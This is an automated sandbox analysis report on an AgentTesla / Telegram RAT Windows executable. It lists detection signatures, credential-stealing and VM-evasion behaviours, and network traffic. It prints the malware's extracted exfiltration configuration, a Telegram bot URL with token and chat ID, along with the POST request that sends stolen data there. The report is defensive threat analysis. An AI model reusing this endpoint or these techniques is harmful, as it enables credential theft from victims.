
Windows Analysis Report
Smh3IA9098.exe

Overview

General Information

Sample Name: Smh3IA9098.exe
Original Sample Name: 9b75823d12157891fafe183679b54831.exe
Analysis ID: 830845
MD5: 9b75823d12157891fafe183679b54831
SHA1: 1e074aab3a27aebdefa87f520350109c95b31cf4
SHA256: 306a4b507ed783c41a906281904642730d4887aac6dcd5d3ee7ba066d0a51efa
Tags: AgentTesla, exe, Telegram

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Smh3IA9098.exe (PID: 1004 cmdline: C:\Users\user\Desktop\Smh3IA9098.exe MD5: 9B75823D12157891FAFE183679B54831)
    • Smh3IA9098.exe (PID: 6132 cmdline: C:\Users\user\Desktop\Smh3IA9098.exe MD5: 9B75823D12157891FAFE183679B54831)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendMessage?chat_id=5737638148"}
Source | Rule | Description | Author | Strings
00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | -
00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
Process Memory Space: Smh3IA9098.exe PID: 6132 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
Process Memory Space: Smh3IA9098.exe PID: 6132 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | -
            No Sigma rule has matched
Timestamp: 03/20/23-18:29:57.946141
Source IP: 192.168.2.6
Destination IP: 149.154.167.220
Source Port: 49708
Destination Port: 443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected


            AV Detection

Source: Smh3IA9098.exe | ReversingLabs: Detection: 33%
Source: Smh3IA9098.exe | Virustotal: Detection: 42%
Source: Smh3IA9098.exe | Joe Sandbox ML: detected
Source: 0.2.Smh3IA9098.exe.47d8ae0.5.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendMessage?chat_id=5737638148"}
Source: Smh3IA9098.exe.6132.1.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendMessage"}
Source: Smh3IA9098.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: Smh3IA9098.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: szrO.pdbSHA256 wV source: Smh3IA9098.exe
Source: Binary string: szrO.pdb source: Smh3IA9098.exe

            Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.6:49708 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: C:\Users\user\Desktop\Smh3IA9098.exe | DNS query: name: api.ipify.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8db29711b5da886
    Host: api.telegram.org
    Content-Length: 981
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 64.185.227.155
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: Smh3IA9098.exe, 00000000.00000002.280786418.0000000007522000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002B71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/
Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5806691582:AAH6u3QmlmdvCPddcnWF_1vIYT8ymbk2K8M/sendDocument
Source: Smh3IA9098.exe, 00000001.00000002.522261092.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 0_2_07920391
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 0_2_079203A0
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 0_2_07920100
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 0_2_079200F0
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 0_2_07DB0040
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 0_2_07DB0007
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_02AAC8B8
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_02AAA8F8
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_02AA9CE0
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_02AAA028
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_0672F337
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_0672039C
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_067230B0
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_06727CE8
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_0672EBD3
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_06728828
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_0672C8F0
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_06779A68
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_0677D918
Source: Smh3IA9098.exe, 00000000.00000002.275145175.0000000003517000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs Smh3IA9098.exe
Source: Smh3IA9098.exe, 00000000.00000002.277752013.0000000004449000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs Smh3IA9098.exe
Source: Smh3IA9098.exe, 00000000.00000002.277752013.00000000047AB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename4fea6f85-f2e4-4165-ba99-4bd867ae23e9.exe4 vs Smh3IA9098.exe
Source: Smh3IA9098.exe, 00000000.00000002.275145175.0000000003487000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs Smh3IA9098.exe
Source: Smh3IA9098.exe, 00000000.00000002.275145175.0000000003487000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename4fea6f85-f2e4-4165-ba99-4bd867ae23e9.exe4 vs Smh3IA9098.exe
Source: Smh3IA9098.exe, 00000000.00000002.291943272.0000000007B90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs Smh3IA9098.exe
Source: Smh3IA9098.exe, 00000000.00000000.252707563.0000000001098000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameszrO.exe> vs Smh3IA9098.exe
Source: Smh3IA9098.exe, 00000001.00000002.520128183.0000000000B38000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Smh3IA9098.exe
Source: Smh3IA9098.exe, 00000001.00000002.519751255.000000000042C000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename4fea6f85-f2e4-4165-ba99-4bd867ae23e9.exe4 vs Smh3IA9098.exe
Source: Smh3IA9098.exe | Binary or memory string: OriginalFilenameszrO.exe> vs Smh3IA9098.exe
Source: Smh3IA9098.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Smh3IA9098.exe C:\Users\user\Desktop\Smh3IA9098.exe
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Process created: C:\Users\user\Desktop\Smh3IA9098.exe C:\Users\user\Desktop\Smh3IA9098.exe
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\Smh3IA9098.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Smh3IA9098.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Smh3IA9098.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Smh3IA9098.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
Source: Smh3IA9098.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Smh3IA9098.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Smh3IA9098.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Smh3IA9098.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Smh3IA9098.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 0_2_079235C2 push ss; iretd 0_2_079235C9
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 0_2_0792398A push edx; retf 0_2_0792398D
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Code function: 1_2_0672300F push es; ret 1_2_06723020
Source: initial sample | Static PE information: section name: .text entropy: 7.873571070736306
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Process information set: NOOPENFILEERRORBOX (92 identical entries)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Smh3IA9098.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\Smh3IA9098.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\Smh3IA9098.exe TID: 4612 | Thread sleep time: -40023s >= -30000s
Source: C:\Users\user\Desktop\Smh3IA9098.exe TID: 1432 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Smh3IA9098.exe TID: 320 | Thread sleep count: 647 > 30
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Window / User API: threadDelayed 647
Source: C:\Users\user\Desktop\Smh3IA9098.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Smh3IA9098.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Smh3IA9098.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Thread delayed: delay time: 40023
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Smh3IA9098.exe | Memory written: C:\Users\user\Desktop\Smh3IA9098.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Process created: C:\Users\user\Desktop\Smh3IA9098.exe C:\Users\user\Desktop\Smh3IA9098.exe
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Users\user\Desktop\Smh3IA9098.exe VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Smh3IA9098.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
